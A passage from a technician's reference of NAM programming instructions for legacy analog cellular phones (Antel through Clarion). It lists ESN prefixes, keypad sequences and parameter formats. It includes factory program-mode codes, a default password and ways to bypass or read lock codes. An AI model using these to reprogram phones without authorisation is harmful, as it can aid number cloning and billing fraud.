Pref only (A only or B only) Roam only (No Home operation) Home only Alternate (Altrernate AB or BA) Press END to exit and Store Selections ------------------------------------------------------------------------------- ANTEL RADIANT 832 XL ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: Antel Programmer: Motorola 1801 -- Celnam, Bytek or Curtis ESN Prefix DEC: 178 HEX: B2 ESN, S/N match Required: Yes Programmable Handset: No Available Channels: 832 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Disabled (Enabled if Equipped) Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 08 Hex Address B7 B0 13 0 0 0 0 0 0 0 0 14 0 0 0 0 0 0 0 0 15 0 0 0 0 0 0 0 0 Hex Address 13 B7 Disable 32 Digit Dial B2 Enable Special Lock Hex Address 14 B7 to B4 Special Lock 1st Digit B3 to B0 Special Lock 2nd Digit Hex Address 15 B7 to B4 Special Lock 1st Digit ------------------------------------------------------------------------------- ANTEL RADIANT 950 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Sun Moon Star Programmer: Handset ESN Prefix DEC: 178 HEX: B2 ESN, S/N match Required: Yes Available Channels: Power On Enter sequence FCN + FCN + * + 950626 + * Software version will be displayed Enter NAM number (1 to 4) within 5 seconds + VOL UP Enter parameter for each step + # + VOL UP (to increment) To complete programming, press FCN + END # digits System ID Format: 5 XXXXX + # + VOL UP Station Class: 2 08 (Preset) + VOL UP Mobile Number: 10 XXX-XXX-XXXX + # + VOL UP Initial Paging Channel: 3 333 or 334 + # + VOL UP Access Overload Class: 2 XX + # + VOL UP Group ID Format: 2 XX + # + VOL UP Lock Code A: 3 XXX + # + VOL UP Lock Code B: 3 XXX + # + VOL UP Local Use Option: 1 1 + # + VOL UP MIN Option: 1 1 + # + VOL UP Preferred System: 1 0(B) or 1(A) + # + VOL UP End-to-End Signalling: 1 1 + # + VOL UP Repertory Option: 1 1 + # + VOL UP Horn Alert Option: 1 1 + # + VOL UP Handsfree Option: 1 0(Disable) or 1(Enable) + # + VOL UP Full Lock Enable: 1 0(Disable) or 1(Enable) + # + VOL UP Enable Lock Mod: 1 1 + # + VOL UP Enable Partial Lock Mode: 1 0(Disable) or 1(Enable) + # + VOL UP Press FCN + END to exit program mode ------------------------------------------------------------------------------- ANTEL RADIANT 950MX ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Sun Moon Star Programmer: Handset ESN Prefix DEC: 178 HEX: B2 ESN, S/N Match Required: Yes Available Channels: 832 Programming Sequence: Power On Enter programming mode: FCN + FCN + * + 950626 + * Software version will be displayed Press (up arrow) key to advance Select NAM 1, 2, 3 oe 4, within 5 seconds Use (up arrow) and (down arrow) keys to step through parameters Press # after entering each parameter to store info. Once all information has been programmed, press FCN + FCN to exit # digits System ID Format: 5 XXXXX + # Station Class: SCM 8 (should be displayed) Mobile Number: 10 XXX-XXX-XXXX + # Initial Paging Channel: 3 333 or 334 + # Access Overload Class: 2 XX + # Group ID Format: 2 XX + # Lock Code A: 3 XXX + # Lock Code B: 3 XXX + # Local Use Option: 1 1 + # MIN Option: 1 1 + # Preferred System: 1 0(B) or 1 (A) + # End-to-End Signalling: 1 1 + # Repertory Option: 1 1 + # Horn Alert Option: 1 1(Enable) or 0(Disable) + # Handsfree Option: 1 1(Enable) or 0(Disable) + # Full Lock Option: 1 1(Enable) or 0(Disable) + # Lock Option: 1 1(Enable) or 0(Disable) + # Partial Lock Option: 1 1(Enable) or o(Disable) + # Horn Alert: FCN + 4 + 1 New Unlock Code: NAM System Select: FCN + 5 + X X=1 AB Pref A X=2 BA Pref B X=3 A only X=4 B only X=5 Home Press CLR to exit. ------------------------------------------------------------------------------- ANTEL STR 300, 350, 500, 550, 700, 770, 900 and 950 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Antel Programmer: Handset ESN Prefix DEC: 146 HEX: 92 ESN, S/N Match Required: Yes Programming Sequence: Enter sequence 04049 + FCN + FCN ESN will be displayed Once SEND to increment Once parameter has been entered, press SEND to enter step and increment Press END to store programmed data in NAM and resume normal operation # digits Area Code: 3 XXX + SEND Mobile Number: 7 XXX-XXXX + SEND System ID Format: 5 XXXXX Local Use Option: 1 1 + SEND MIN Option: 1 1 + SEND Initial Paging Channel: 4 0333 or 0334 + SEND Access Overload Class: 2 XX + SEND Preferred System: 1 0(B) + 1(A) + SEND Group ID Format: 2 XX + SEND Security Code: 4 XXXXX + SEND Handsfree Option: 1 0(Disable) + SEND or 1(Enable) + SEND Horn Alert Option: 1 1 + SEND Autonomous Registration: 1 0(Disable) + SEND or 1(Enable) + SEND Whereabouts Known: 1 0(Disable) + SEND or 1(Enable) + SEND One minute Audible Beep: 1 0(Disable) + SEND or 1(Enable) + SEND Continuous Tone: 1 0(Disable) + SEND or 1(Enable) + SEND Dual NAM: 1 0(Disable) + SEND or 1(Enable) + SEND (Dual NAM is enabled, programming begins again for second NAM) Horn Alert: FCN + 9 New Unlock Code: NAM System Select: FCN + 4 + * or # (to scroll options) Selections include: Preferred (AB or BA) Altr Only (Alternate Only, A only, or B Only) Pref Only (A Only or B only) Roam Only (No Home Operation) Home Only Alternat (Alternate, AB or BA) Press END to exit and store selection. ------------------------------------------------------------------------------- ANTEL STR 1100 portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Sanyo Programmer: Handset ESN Prefix DEC: 175 HEX: AF ESN, S/N Match Required: Yes (17500 + last 5 digits) Available Channels: 832 Programming Sequence: Enter sequence M(Mute) + 310# + 2567252 + RCL (must be entered within 10 seconds of power up) ESN will be displayed Press (up arrow) + (up arrow) to increment Select NAM (1,2 or 3) + (up arrow) NAM Prog Exists - Press 0 (to reselect NAM #) or Press 1 to enter program mode + (up arrow) Once each parameter has been entered, press (up arrow) to enter step and increment Press STO to store programmed data in NAM and END to resume normal operation # digits Mobile Number: 10 CLR + XXX-XXX-XXXX + (up arrow) System ID Format: 5 CLR + XXXXX + (up arrow) Local Use Option: 1 CLR + 1 + (up arrow) MIN Option: 1 CLR + 1 + (up arrow) Initial Paging Channel: 4 CLR + (0333 or 0334) + (up arrow) Access Overload Class: 2 CLR + XX + (up arrow) Preferred System: 1 CLR + 0(B) or 1(A) + (up arrow) Group ID Format: 2 CLR + XX + (up arrow) Unlock Code: 4 CLR + XXXX + (up arrow) End-to-End Signalling: 1 CLR + 1 + (up arrow) A/B Select: 1 CLR + 1 + (up arrow) NAM Program Area Code: 1 CLR + 1 + (up arrow) Discontinuous Trans: 1 CLR + (0 or 1) + 1 + (up arrow) Press STO to store information and END to exit program mode. New Unlock Code: NAM System Select: FCN + 5 + 5 + 5, etc. (to scroll choices) Selections include: Pref Only (A only or B only) Standard (AB or BA) Home Only Alternate Only (BA or AB) Press END to exit and store selection. ------------------------------------------------------------------------------- ARA ------------------------------------------------------------------------------- see GE CARFONE programming instructions ------------------------------------------------------------------------------- ASTROTEL ------------------------------------------------------------------------------- see OKI-400 series, handset programming instructions ------------------------------------------------------------------------------- AT&T 1100 and 1200 ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: Hitachi Programmer: Motorola or Curtis ESN Prefix DEC: 132 HEX: 84 ESN, S/N Match Required: No Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Enabled or Disabled Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Horn Alert: HORN New Unlock Code: NAM System Select: NAM ------------------------------------------------------------------------------- AT&T 1300, 1300C and 1400 ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: Mitsubishi Programmer: Curtis or Bytek ESN Prefix DEC: 134 HEX: 86 ESN, S/N Match Required: No Programmable Handset: No Available Channels: 666 MIN 1: XXX Lock: XXX MIN 2: XXX System ID Format: XXXX Horn Alert Option: 1 Handsfree Option: 1 (if equipped) End-to-End Signalling: 1 Group ID Format: XX Access Overload Class: XX Station Class: 0000 Local Use: 1 Initial Paging Channel: 333 or 334 Preferred System: 1(A) or 0(B) Manufacturer Options (for Curtis Programmer) 33 Enable System Select: 1 34 Roam Inhibit: 0 Horn Alert: HORN New Unlock Code: NAM System Select: When the manufacturer option, 33 above, is enabled, the following sequence allows system selection. This process must be repeated each time the phone is turned on. STORE + # + # + #, etc. (One of the following will appear) AAABBB or BBBAAA Standard (AB or BA) BBBAAA or AAABBB Alternate (BA or AB) CSOAAA or CSOBBB Home AAAAAA or BBBBBB Pref Only (A only or B only) BBBBBB or AAAAAA Non-Pref Only (B only or A only) Press CLEAR to exit ------------------------------------------------------------------------------- AT&T 1710 portable ------------------------------------------------------------------------------- see HITACHI CR-2111H ------------------------------------------------------------------------------- AUDI ------------------------------------------------------------------------------- see Motorola Programming (Use Program Sequence 6) ------------------------------------------------------------------------------- AUDIOVOX BC-2 and CMT 125 ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: Shintom Programmer: Bytek, Curtis or Motorola ESN Prefix DEC: 174 HEX: AE ESN, S/N Match Required: Yes Programmable Handset: No Availble Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Enabled or Disabled Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Manufacturer Options: Hex Address B7 B0 13 0 0 0 0 0 0 0 1 14 0 0 0 0 0 0 0 0 15 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 17 0 0 0 0 0 0 0 0 18 0 0 0 0 0 0 0 0 19 0 0 0 0 0 0 0 0 1A 0 0 0 0 0 0 0 0 1B 0 0 0 0 0 0 0 0 Description: Address 13 -- B0 Extended Digits B3 Timer Beeper Tone Address 14 -- Horn Alert Safety Timer B0 B1 Duration 0 0 2 hours 1 0 4 hours 0 1 6 hours 1 1 8 hours Address 18 -- Call Restriction Code - 1st two of three digits B7 to B4 1st digit B3 to B0 2nd digit Address 19 -- Call Restriction Code - 3rd of three digits B7 to B4 3rd digit Address 1A -- Accumulated Timer Reset Code 1st two of three digits B7 to B4 1st digit B3 to B0 2nd digit Address 1B -- Accumulated Timer Reset Code 3rd of three digits B7 to B4 3rd digits ------------------------------------------------------------------------------- AUDIOVOX BC55, CMT 410, CTX 1500, 2500, 3100, 4000, 4100 and SP 85 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Toshiba Programmer: Handset ESN Prefix DEC: 138 HEX: 8A ESN, S/N Match Required: No Programmable Handset: Yes (requires current unlock code) Available Channels: 832 Programming Sequence: Power On (unlock current unlock code mode) XXX + FUNC + # + 1 XXX=000 (new units) XXX=current unlock code Enter each item, then press STO # or * can be used to increment or decrement FUNC + SND writes data in NAM FUNC + CLR initialized phone # digits Mobile Number: 10 XXX-XXX-XXXX Security Code: 3 XXX System ID Format: 5 XXXXX Access Overload Class: 2 XX Group ID Format: 2 XX Local Use Option: 1 1 MIN Option: 1 1 Initial Paging Channel: 4 0333 or 0334 Preferred System: 1 0(B) or 1(A) Station Class: 4 1000 Program Options1: 8 XXXXX000 (see options below) Program Options2: 8 XXXX0000 (see options below) Safety Timer (CTX-4000): 2 00 to 31 hours No Charge Airtime Delay: 3 000 to 255 seconds Call Timer Reset Code: 3 XXX Roam Inhibit Sys 1: 5 XXXXX Roam Inhibit Sys 2: 5 XXXXX Roam Inhibit Sys 3: 5 XXXXX Roam Inhibit Sys 4: 5 XXXXX Roam Inhibit Sys 5: 5 XXXXX Reserved for Future Use: - ----------- Program Options1: Audible Call Timer Auto Lock Auto Redial Call Restriction 32-Digit Dialing Not used Not used Not used Program Options2: Handsfree End-to-End Signalling Repertory Dialing Horn Alert Not used Not used Not used Not used Horn Alert: FCN + 2 + turn ignition off New Unlock Code: NAM System Select: Review - FUNC + 0 + 4 + FUNC + 0 + X X=0 Standard (AB or BA) X=1 Pref Only X=2 Home X=3 Non-Pref Only (Roam inihibit specific System ID - NAM option) ------------------------------------------------------------------------------- AUDIOVOX BC55A, CMT410A, CTR1900 transportable, CTX3100A, CTX4100A & SP85A ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Toshiba Programmer: Handset ESN Prefix DEC: 138 HEX: 8A ESN, S/N Match Required: No (see bar-graph label on transceiver) Programmable Handset: Yes (requires current unlock code) Available Channels: 832 Programming Sequence: Power On (unlock current unlock code mode) XXX + FUNC + # + 1 XXX=000 (new units) XXX=current unlock code Enter each item, then press STO # or * can be used to increment or decrement FUNC + SND writes data in NAM FUNC + CLR initialized phone and exits program mode # digits Mobile Number: 10 XXX-XXX-XXXX + STO Security Code: 3 XXX + STO System ID Format: 5 XXXXX + STO Access Overload Class: 2 XX + STO Group ID Format: 2 XX + STO Local Use Option: 1 1 + STO MIN Option: 1 1 + STO Initial Paging Channel: 4 0333 or 0334 + STO Preferred System: 1 0(B) or 1(A) + STO Station Class: 4 1000 + STO Program Options1: 8 XXXXX000 + STO (see options below) Program Options2: 8 XXXX0000 + STO (see options below) Safety Timer: 2 00 to 31 hours + STO No Charge Airtime Delay: 3 000 to 255 seconds + STO Call Timer Reset Code: 3 XXX + STO Roam Inhibit Sys 1: 5 XXXXX + STO Roam Inhibit Sys 2: 5 XXXXX + STO Roam Inhibit Sys 3: 5 XXXXX + STO Roam Inhibit Sys 4: 5 XXXXX + STO Roam Inhibit Sys 5: 5 XXXXX + STO Reserved for Future Use: - ----------- Program Options1: Audible Call Timer Auto Lock Auto Redial Call Restriction 32-Digit Dialing Not used Not used Not used Program Options2: Handsfree End-to-End Signalling Repertory Dialing Horn Alert Not used Not used Not used Not used Horn Alert: FCN + 2 + turn ignition off New Unlock Code: NAM System Select: Review - FUNC + 0 + 4 Set - FUNC + 0 + X X=0 Standard (AB or BA) X=1 Pref Only X=2 Home X=3 Non-Pref Only ------------------------------------------------------------------------------- AUDIOVOX CMT300 (BMW), CTX3200A, CTRX4200A, 832CO, C1000, CTR2000 & TCT400 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Toshiba Programmer: Handset ESN Prefix DEC: 138 HEX: 8A ESN, S/N Match Required: No (see bar-graph label on transceiver) Stamped Model Number: CMT300, CTX3200A, 832CO, CTR2000, C1000, 3200A CTX4200A, 4200A Available Channels: 832 Programming Sequence: Power On (unlock if phone is in lock mode) XXX + FUNC + # + 1 XXX=000 (new units) XXX=current unlock code Enter each item, then press STO Press # or * to increment or decrement FUNC + SND writes data in NAM FUNC + CLR initializes phone and exits program mode If the current unlock code doesn't allow program access, the phone may have been programmed with an activation code (see last step) If this is the case, the phone must be returned to the factory for programming. Mobile Number: 10 XXX-XXX-XXXX + STO Security Code: 3 XXX + STO System ID Format: 5 XXXXX + STO Access Overload Class: 2 XX + STO Group ID Format: 2 XX + STO Local Use Options: 1 1 + STO MIN Option: 1 1 + STO Initial Paging Channel: 4 0333 or 0334 + STO Preferred System: 1 0(B) or 1(A) + STO Station Class: 4 1000 + STO Program Options1: 8 XXXXX000 + STO Program Options2: 8 XXXXX000 + STO Safety Timer: 2 00 to 31 hours + STO No Charge Airtime Delay: 3 0000 to 255 seconds + STO Call Timer Reset Code: 3 XXX + STO Roam Inhibit Sys 1: 5 XXXXX + STO Roam Inhibit Sys 2-25: 5 XXXXX + STO NAM Reprogram Code: 5 XXXXX + STO Reserved: Reserved: Reserved: Activation Code: 7 XXXXXXX + STO Program Options1: Audible Call Timer Auto Lock Auto Redial Call Restriction 32-Digit Dialing Not used Not used Not used Program Options2: Handsfree End-to-End Signalling Repertory Dialing Horn Alert 911 Dial Not used Not used Not used Horn Alert: FCN + 2 + turn ignition off New Unlock Code: NAM System Select: Review - FUNC + 0 + 4 Set - FUNC + 0 + X X=0 Standard (AB or BA) X=1 Pref Only X=2 Home X=3 Non-Pref Only ------------------------------------------------------------------------------- AUDIOVOX CMT-500 ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: Toshiba Programmer: Motorola, Curtis or Bytek ESN Prefix DEC: 138 HEX: 8A ESN, S/N Match Required: No Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Hansfree Option: Enabled or Disabled Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Manufacturer Options: Hex Address B7 B0 13 0 0 0 0 0 0 1 1 14 0 0 0 0 0 0 0 0 15 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 17 0 0 0 0 0 0 0 0 18 0 0 0 0 0 0 0 0 19 0 0 0 0 0 0 0 0 1A 0 0 0 0 0 0 0 0 1B X X X X X X X X 1C X X X X 0 0 0 0 Description: Address 13 -- B0 Call Timer B1 A/B Switch Address 1B -- B4-B7 Call Timer Clear Code 1st Digit B0-B3 Call Timer Clear Code 2nd Digit Address 1C -- B4-B7 Call Timer Clear Code 3rd Digit ------------------------------------------------------------------------------- AUDIOVOX SMT-1000 ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: Toshiba Programmer: Motorola, Curtis, or Bytek ESN Prefix DEC: 138 HEX: 8A ESN, S/N Match Required: No Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Enabled or Disabled Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Horn Alert: HORN New Unlock Code: NAM System Select: NAM (AB or BA only) ------------------------------------------------------------------------------- AUDIOVOX CMT-3000 ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: Toshiba Programmer: Motorola, Curtis, or Bytek ESN Prefix DEC: 138 HEX: 8A ESN, S/N Match Required: No Programmable Handset: No Available Channels: 666 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Disabled Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 00 Manufacturer Options: Hex Address B7 B0 13 0 0 0 0 0 0 0 1 14 0 0 0 0 0 0 0 0 15 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 17 0 0 0 0 0 0 0 0 18 0 0 0 0 0 0 0 0 19 0 0 0 0 0 0 0 0 1A 0 0 0 0 0 0 0 0 1B X X X X X X X X 1C X X X X 0 0 0 0 Description: Address 13 -- B0 Call Timer Address 1B -- B4-B7 Call Timer Clear Code 1st Digit B0-B3 Call Timer Clear Code 2nd Digit Address 1C -- B4-B7 Call Timer Clear Code 3rd Digit Horn Alert: HORN ALERT + Turn ignition off New Unlock Code: NAM System Select: n/a ------------------------------------------------------------------------------- AUDIOVIX CTX-4500 and CTX-5000 portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Toshiba Programmer: Handset ESN Prefix DEC: 138 HEX: 8A ESN, S/N Match Required: No Stamped Model Number: CTX-5000 Programmable Handset: Yes (requires current unlock code) Available Channels: 832 Programming Sequence: Power On (unlock current unlock code mode) XXX + FUNC + # + 1 XXX=000 (new units) XXX=current unlock code Enter each item, then press STO # or * can be used to increment or decrement FUNC + SND writes data in NAM FUNC + CLR initialized phone and exits program mode # digits Mobile Number: 10 XXX-XXX-XXXX + STO Security Code: 3 XXX + STO System ID Format: 5 XXXXX + STO Access Overload Class: 2 XX + STO Group ID Format: 2 XX + STO Local Use Option: 1 1 + STO MIN Option: 1 1 + STO Initial Paging Channel: 4 0333 or 0334 + STO Preferred System: 1 0(B) or 1(A) + STO Station Class: 4 1000 + STO Program Options1: 8 XXXXX000 + STO (see options below) Program Options2: 8 XXXX0000 + STO (see options below) Safety Timer: 2 00 to 31 hours + STO No Charge Airtime Delay: 3 000 to 255 seconds + STO Call Timer Reset Code: 3 XXX + STO Roam Inhibit Sys 1: 5 XXXXX + STO Roam Inhibit Sys 2: 5 XXXXX + STO Roam Inhibit Sys 3: 5 XXXXX + STO Roam Inhibit Sys 4: 5 XXXXX + STO Roam Inhibit Sys 5: 5 XXXXX + STO Reserved for Future Use: - ----------- Program Options1: Audible Call Timer Auto Lock Auto Redial Call Restriction 32-Digit Dialing Not used Not used Not used Program Options2: Handsfree End-to-End Signalling Repertory Dialing Horn Alert Not used Not used Not used Not used Horn Alert: FCN + 2 + turn ignition off New Unlock Code: NAM System Select: Review - FUNC + 0 + 4 Set - FUNC + 0 + X X=0 Standard (AB or BA) X=1 Pref Only X=2 Home X=3 Non-Pref Only ------------------------------------------------------------------------------- AUDIOVOX MVX 500 portable ------------------------------------------------------------------------------- NAM Type: EPROM Manufacturer: Toshiba Programmer: Handset ESN Prefix DEC: 138 HEX: 8A ESN, S/N Match Required: No Stamped Model Number: MVX 500 Available Channels: 832 Programming Sequence: Power On (unlock current unlock code mode) XXX + FUNC + # + 1 XXX=000 (new units) XXX=current unlock code Enter each item, then press STO # or * can be used to increment or decrement FUNC + SND writes data in NAM FUNC + CLR initialized phone and exits program mode # digits Mobile Number: 10 XXX-XXX-XXXX + STO Security Code: 3 XXX + STO System ID Format: 5 XXXXX + STO Access Overload Class: 2 XX + STO Group ID Format: 2 XX + STO Local Use Option: 1 1 + STO MIN Option: 1 1 + STO Initial Paging Channel: 4 0333 or 0334 + STO Preferred System: 1 0(B) or 1(A) + STO Station Class: 4 1000 + STO Program Options1: 8 XXXXX0XX + STO (see options below) Program Options2: 8 XXX0X000 + STO (see options below) Safety Timer: 2 00 to 31 hours + STO No Charge Airtime Delay: 3 000 to 255 seconds + STO Call Timer Reset Code: 3 XXX + STO Roam Inhibit Sys 1: 5 XXXXX + STO Roam Inhibit Sys 2: 5 XXXXX + STO Roam Inhibit Sys 3: 5 XXXXX + STO Roam Inhibit Sys 4: 5 XXXXX + STO Roam Inhibit Sys 5: 5 XXXXX + STO Reserved for Future Use: - ----------- Program Options1: Audible Call Timer Auto Lock Auto Redial Call Restriction 32-Digit Dialing - 0=16 digits, 1=32 digits Not used Data Auto Answer Any Dial Answer Program Options2: Handsfree End-to-End Signalling Repertory Dialing Not used 911 Dial Not used Not used Not used Horn Alert: FCN + 2 + turn ignition off New Unlock Code: NAM System Select: Review - FUNC + 0 + 4 Set - FUNC + 0 + X X=0 Standard (AB or BA) X=1 Pref Only X=2 Home X=3 Non-Pref Only ------------------------------------------------------------------------------- AUDIOVOX PT300 portable ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Toshiba Programmer: Handset ESN Prefix DEC: 138 HEX: 8A ESN, S/N Match Required: No Programmable Handset: Yes (requires current unlock code) Available Channels: 832 Programming Sequence: Power On (unlock current unlock code mode) XXX + FUNC + # + 1 XXX=000 (new units) XXX=current unlock code Enter each item, then press STO # or * can be used to increment or decrement FUNC + SND writes data in NAM FUNC + CLR initialized phone and exits program mode # digits Mobile Number: 10 XXX-XXX-XXXX + STO + # Security Code: 3 XXX + STO + # System ID Format: 5 XXXXX + STO + # Access Overload Class: 2 XX + STO + # Group ID Format: 2 XX + STO + # Local Use Option: 1 1 + STO + # MIN Option: 1 1 + STO + # Initial Paging Channel: 4 0333 or 0334 + STO + # Preferred System: 1 0(B) or 1(A) + STO + # Station Class: 4 1010 (binary) or 10 (dec) + STO + # Program Options1: 8 XXXXX000 + STO + # (see options below) Program Options2: 8 XXXX0000 + STO + # (see options below) Safety Timer: 2 00 to 31 hours + STO + # No Charge Airtime Delay: 3 000 to 255 seconds + STO + # Call Timer Reset Code: 3 XXX + STO + # Roam Inhibit Sys 1: 5 XXXXX + STO + # Roam Inhibit Sys 2: 5 XXXXX + STO + # Roam Inhibit Sys 3: 5 XXXXX + STO + # Roam Inhibit Sys 4: 5 XXXXX + STO + # Roam Inhibit Sys 5: 5 XXXXX + STO + # Roam Inhibit Sys 6: 5 XXXXX + STO + # Roam Inhibit Sys 7: 5 XXXXX + STO + # Roam Inhibit Sys 8: 5 XXXXX + STO + # Roam Inhibit Sys 9: 5 XXXXX + STO + # Roam Inhibit Sys 10: 5 XXXXX + STO + # Program Options1: Audible Call Timer Auto Lock Auto Redial Call Restriction 32-Digit Dialing - 0=16 digits, 1=32 digits Not used Not used Not used Program Options2: Handsfree End-to-End Signalling Repertory Dialing 911 Dial Not used Not used Not used Not used Horn Alert: FCN + 2 + turn ignition off New Unlock Code: NAM System Select: Review - FUNC + 0 + 4 Set - FUNC + 0 + X X=0 Standard (AB or BA) X=1 Pref Only X=2 Home X=3 Non-Pref Only ------------------------------------------------------------------------------- BENTLEY BX7 ------------------------------------------------------------------------------- see NOVATEL 8320 for programming instructions ------------------------------------------------------------------------------- BLAUPUNKT MT 8000AU ------------------------------------------------------------------------------- see PANASONIC 6104EB ------------------------------------------------------------------------------- BLAUPUNKT MT9000 and MT9000P ------------------------------------------------------------------------------- see PANASONIC 6106/6110 ------------------------------------------------------------------------------- BLAUPUNKT MT9010 and MT9010P ------------------------------------------------------------------------------- see Motorola handset programming instructions. Use programming sequence number 6. Horn Alert: FCN + 4 New Unlock Code: FCN + 6-digit security code + new 3-digit Unlock Code + # System Select: RCL/STO + repeatedly press * (One of the following prompts will appear) STD AB or STD BA (Standard) SCAN BA or SCAN AB (Alternate) SCAN A SCAN B Press # to enter selection. ------------------------------------------------------------------------------- CHRYSLER VISORPHONE ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: OKI Programmer: Keypad ESN Prefix DEC: 129 HEX: 81 ESN, S/N Match Required: Yes Available Channels: 832 Programming Sequence: Power On After phone initialized, press 4 key and 6 key simultaneously, then release. Enter 10-digit password XXXXXXXXXX 0008693428 or 10-digit code programmed by previous technician (enter within 20 seconds) ESN and Software version will be displayed Press 0 + 0 to initialize transceiver Enter step number (1-9) then enter data Press STO to enter each step Press FUNC and phone reverts to "Press 1-9" CLR key corrects data before STO is pressed To program 2nd NAM, press * when phone displays "Press 1-9" (this repeats steps 3-5) Press CLR + CLR to write data in NAM # digits Mobile Number: 10 XXX-XXX-XXXX + STO + FUNC System ID Format: 5 XXXXX + STO + FUNC Initial Paging Channel: 3 XXX + STO + FUNC Access Overload Class: 2 XX + STO + FUNC Lock Code: 4 XXXX + STO + FUNC Group ID Format: 2 XX + STO + FUNC Station Class: 4 1000 + STO + FUNC (Enter Station class in binary - 1000 binary, 08 decimal) Options: 4 11X1 + STO + FUNC (see below) Security Code: 6 XXXXXX + STO + FUNC Press CLR + CLR to write data in NAM Options: 0 (Disable) 1 (Enable) MIN Option Local Use Handsfree Audio mute New Unlock Code: NAM System Select: FUNC + 3 + 3 + 3, etc. (to scroll choices) SCN AB SCN BA SCN A SCN B SCN Ho (Home) SID NO. (Enter System ID #) Press STO to enter selection ------------------------------------------------------------------------------- CINCINATTI MICROWAVE portable ------------------------------------------------------------------------------- Not handset programmable from the factory. The phone can be sent for modification to CINCINNATTI MICROWAVE to be handset programmable. Call 1-800-247-4300 for instructions and cost. After phone has been factory modified to accept handset programming, use MOTOROLA ULTRA CLASSIC programming instructions. Place the phone in a manual test mode to read the existing 6-digit security code necessary for keypad programming. This has dual NAM capability. To toggle between NAM's press RCL + # + STO. ------------------------------------------------------------------------------- CITICOMM MM1000 ------------------------------------------------------------------------------- NAM Type: EEPROM Manufacturer: Citicomm Programmer: Keypad with cradle jumper installed ESN Prefix DEC: 163 HEX: A3 ESN, S/N Match Required: Yes Available Channels: 832 Programming Sequence: Open cradle and insert a jumper wire from contact #8 to contact #10 on cradle PC board (see schematic next page) Power On Press * + * + # + # + FCN + STO (within 10 seconds to enter program mode) Enter NAM option 0, 1 or 2 0 NAM 1 only (lock out NAM 2) 1 Program NAM 1 2 Program NAM 2 Enter parameter for each step then press STO to store increment CLR key corrects data before STO is pressed Press SEND to write data in NAM System ID Format: 5 XXXXX + STO Local Use Option: 1 1 + STO MIN Option: 1 1 + STO Mobile Number: 10 XXX-XXX-XXXX + STO Station Class: 2 08 + STO Initial Paging Channel: 4 0333 or 0334 + STO Access Overload Class: 2 XX + STO Preferred System: 1 0(B) or 1(A) + STO Group ID Format: 2 XX + STO Press SEND to write data in NAM. New Unlock Code: Current 4-digit unlock code + FCN + 0 + new 4-digit unlock code System Select: 4-digit unlock code + FCN + * + * + *, etc. (the following options will be displayed) + STO (to enter selection) ------------------------------------------------------------------------------- CLARION 1100 CT ------------------------------------------------------------------------------- NAM Type: Tri-State Manufacturer: Clarion Programmer: Motorola 1801 -- Celnam, Curtis or Bytek ESN Prefix DEC: 140 HEX: 8C ESN, S/N Match Required: No Programmable Handset: No Available Channels: 832 Phone Number Format: XXX-XXX-XXXX Lock Code Format: XXX MIN Option: Enabled Repertory Option: Enabled Handsfree Option: Enabled or Disabled Local Use Option: Enabled End-to-End Signalling: Enabled Horn Alert Option: Enabled System ID Format: XXXXX Preferred System: A or B Access Overload Class: XX Group ID Format: XX Initial Paging Channel: 333 or 334 Station Class: 08 Horn Alert: L/H + HORN/# (simultaneously) New Unlock Code: NAM System Select: FUNC + 2 + 0 + SRCH + SRCH + SRCH (to scroll) (one of the following will appear) Standard (AB or BA) Invert (BA or AB) Home Roam (A only or B only) Press STO to enter selection ------------------------------------------------------------------------------- CLARION 3000 CT 